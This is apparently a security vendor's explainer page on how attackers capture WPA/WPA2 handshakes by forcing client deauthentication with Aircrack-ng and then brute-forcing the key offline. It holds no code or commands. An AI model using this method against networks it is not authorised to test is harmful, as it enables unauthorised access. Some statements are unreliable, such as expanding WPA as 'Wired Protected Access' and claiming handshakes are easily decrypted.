Wifi Password Recovery - UTM - Vulnerability Scanning
SHOP
CLOUD
VIP
Sun Sun Sun

Resources - IT Security Technical Resources Part4 -

WPA Handshake

How do hackers or remote attackers obtain the WPA  or WPA2 Handshake from a wireless access point easily?

By launching a wifi bomb they can force all users to disconnect the access point for a few seconds.

Their software will automatically reconnect and this way they sniff the connection handshake.

Then they can go to another location and safely brute force it with a 1 billion entries.

A handshake is basically an automatic process of negotiation between two entities, usually your computer and the network server it wants to connect to, although it could also mean your printer trying to connect to your PC or your phone doing the same thing. It's the procedure that sets the configurations and parameters needed to make the communication channel run smoothly without manually putting in specifications and whatnot every time you connect heterogeneous systems or machines together. One example of handshaking that most any Internet user is familiar with is that of modems connecting to one another.

Communication Negotiation 

When the connection is first established between two modems, the negotiation of communication restrictions and boundaries occurs for a brief period of time. Afterwards, the infamous "squealing" noise that people hear from old, dial-up modems sporting speaker outputs (it's a sound that modifies its pitch a hundred times every second) once the connection has been successfully made is the aural manifestation of two modems engaging in the handshake process. Thereafter, once everything has been agreed upon in regards to parameters, they're (the parameters) are used to offer streamlined information transmission over the channel as a function of its capacity and quality.

Free High Quality Wifi

Although handshakes are more often than not what hackers need to capture in order to gain unauthorized access to systems and networks—or at the very least, get free, high-quality WiFi superior to those found in coffee shops and libraries—it's a necessary and unavoidable step to ensuring smooth connections from two otherwise different and normally mismatched systems. In turn, a Wired Protected Access or WPA handshake refers to the negotiation process between the computer and a WiFi server using WPA encryption to keep intruders or unauthorized users from accessing the network (e.g., a four-way Temporal Key Integrity Protocol or TKIP handshake, with TKIP referring to one of many encryption algorithms that WPA supports).

WPA Handshake Exploit

As for using WPA handshakes as exploits for security breaches, there are a variety of methods suited for this hacking task. Any hacker who wants to capture a four-way TKIP handshake without any help will probably have to observe Internet traffic for hours-on-end, patiently stalking for a client to link to a network. As easier way to capture handshakes for hacking purposes involves the use of a hacking tool called Aircrack-ng and forced deauthentication of a connected client PC in order to make him reconnect back up to the server exactly when you want him to connect.

Authentication Capture

Ironically enough, it's during the procedure wherein the encrypted WPA key is re-exchanged that a connection is most vulnerable for hacker attack—the very process needed to protect a network can open it up to attack, like barging into a house while someone is in the middle of bolting the locks on his doors. Once the full authentication handshake has been captured from the client and an access point, the hacker can easily decrypt the information behind the handshake, thus allowing him the key to access the previously impenetrable network.

 

 

 


Encyclopedia | Link Policy | Privacy Statement | Resources | Sitemap | User Policy

SecPoint® © Copyright 1999-2015
US Toll Free: +1-855-489-3724 - EU Toll Free: +44-808-101-2272